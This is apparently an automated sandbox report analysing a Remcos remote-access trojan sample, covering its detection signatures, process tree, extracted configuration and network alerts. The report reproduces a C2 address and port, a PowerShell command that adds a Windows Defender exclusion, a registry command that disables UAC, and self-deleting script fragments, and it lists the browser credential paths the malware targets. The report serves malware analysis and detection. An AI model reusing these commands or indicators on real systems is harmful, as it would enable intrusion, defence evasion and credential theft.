Windows Analysis Report
IB9876789000.bat.exe

Overview

General Information

Sample name:IB9876789000.bat.exe
Analysis ID:1570827
MD5:f443c222255e35ee6dd0e194360c23ce
SHA1:a8c84df31a575ab84e6255b89351ce877c9619c8
SHA256:7053c8d9983dc949e5d559ba1b006b8ba9c059a23e06cd87c857c3d04201381b
Tags:exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Disables UAC (registry)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • IB9876789000.bat.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\IB9876789000.bat.exe" MD5: F443C222255E35EE6DD0E194360C23CE)
    • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7424 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • regedit.exe (PID: 1900 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • wmplayer.exe (PID: 7172 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7500 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7512 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • wmplayer.exe (PID: 7528 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • wmplayer.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • WerFault.exe (PID: 7288 cmdline: C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
6.2.wmplayer.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
6.2.wmplayer.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
6.2.wmplayer.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
6.2.wmplayer.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
6.2.wmplayer.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IB9876789000.bat.exe", ParentImage: C:\Users\user\Desktop\IB9876789000.bat.exe, ParentProcessId: 1220, ParentProcessName: IB9876789000.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, ProcessId: 2228, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IB9876789000.bat.exe", ParentImage: C:\Users\user\Desktop\IB9876789000.bat.exe, ParentProcessId: 1220, ParentProcessName: IB9876789000.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force, ProcessId: 2228, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files (x86)\Windows Media Player\wmplayer.exe, ProcessId: 7172, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T08:42:10.005853+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 192.210.150.26 | 3678 | TCP
2024-12-08T08:42:11.112791+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
2024-12-08T08:44:14.205921+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
2024-12-08T08:46:14.509273+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.26 | 3678 | 192.168.2.5 | 49717 | TCP
2024-12-08T08:42:13.381508+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 178.237.33.50 | 80 | TCP

AV Detection

Source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: IB9876789000.bat.exe | ReversingLabs: Detection: 42%
Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: IB9876789000.bat.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0043293A
Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_6a79849f-c

Exploits

Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR

Privilege Escalation

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00406764 _wcslen,CoGetObject,6_2_00406764
Source: IB9876789000.bat.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: Microsoft.VisualBasic.pdbH source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: mscorlib.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb0 source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbH source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbh source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WERBAFE.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_100010F1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10006580 FindFirstFileExA,6_2_10006580
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06

Networking

Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49717 -> 192.210.150.26:3678
Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:3678 -> 192.168.2.5:49717
Source: Malware configuration extractor | IPs: 192.210.150.26
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1  Host: geoplugin.net  Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 192.210.150.26
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49720 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040455B WaitForSingleObject,SetEvent,recv,6_2_0040455B
Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wmplayer.exe, 0000000D.00000003.2208934536.00000000035CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wmplayer.exe, 0000000D.00000003.2208934536.00000000035CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wmplayer.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvCBB7.tmp.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
